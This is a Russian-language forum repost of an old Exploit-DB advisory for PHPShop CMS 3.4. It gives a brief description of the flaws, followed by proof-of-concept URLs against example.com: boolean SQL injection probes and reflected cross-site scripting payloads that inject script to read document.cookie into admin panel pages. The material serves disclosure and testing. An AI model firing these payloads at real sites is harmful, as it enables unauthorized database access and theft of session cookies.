Exploit PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injections

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36471
Проверка EDB
  1. Пройдено
Автор
HIGH-TECH BRIDGE SA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-12-20
PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injections
Код: 
source: https://www.securityfocus.com/bid/51130/info

PHPShop CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHPShop CMS 3.4 is vulnerable; prior versions may also be affected. 

SQL:

http://www.example.com/phpshop/admpanel/photo/admin_photo_content.php?pid=6%20AND%201=2

http://www.example.com/phpshop/admpanel/page/adm_pages_new.php?catalogID=3%20AND%201=2

http://www.example.com/phpshop/admpanel/catalog/admin_cat_content.php?pid=3%20AND%201=2

http://www.example.com/phpshop/admpanel/catalog/adm_catalog_new.php?id=3%20AND%201=1

XSS:

http://www.example.com/phpshop/admpanel/banner/adm_baner_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E

http://www.example.com/phpshop/admpanel/gbook/adm_gbook_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E

http://www.example.com/phpshop/admpanel/links/adm_links_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E

http://www.example.com/phpshop/admpanel/menu/adm_menu_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3 C/script%3E

http://www.example.com/gbook/?a=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/phpshop/admpanel/catalog/admin_cat_content.php?pid=%22%3E%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E

http://www.example.com/phpshop/admpanel/catalog/adm_catalog_new.php?id=%%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E

http://www.example.com/phpshop/admpanel/page/adm_pages_new.php?catalogID=%22%3E%3Cscript%3Ealert%28document.c ookie%29;%3C/script%3E

http://www.example.com/phpshop/admpanel/photo/admin_photo_content.php?pid=%22%3E%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
382
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpShop 0.8.1 - Multiple Vulnerabilities
Ответы
0
Просмотры
300
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHPShop 2.1 EE - 'name_new' Cross-Site Scripting
Ответы
0
Просмотры
449
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpShop 2.0 - SQL Injection
Ответы
0
Просмотры
411
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpShop 0.8.1 - 'page' Cross-Site Scripting
Ответы
0
Просмотры
363
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpShop 0.8.1 - SQL Injection / Filter Bypass
Ответы
0
Просмотры
292
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Vaidya-Mitra 1.0 - Multiple SQLi
Ответы
0
Просмотры
622
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Thesis Archiving System v1.0 - Multiple-SQLi
Ответы
0
Просмотры
635
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zenphoto 1.6 - Multiple stored XSS
Ответы
0
Просмотры
664
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу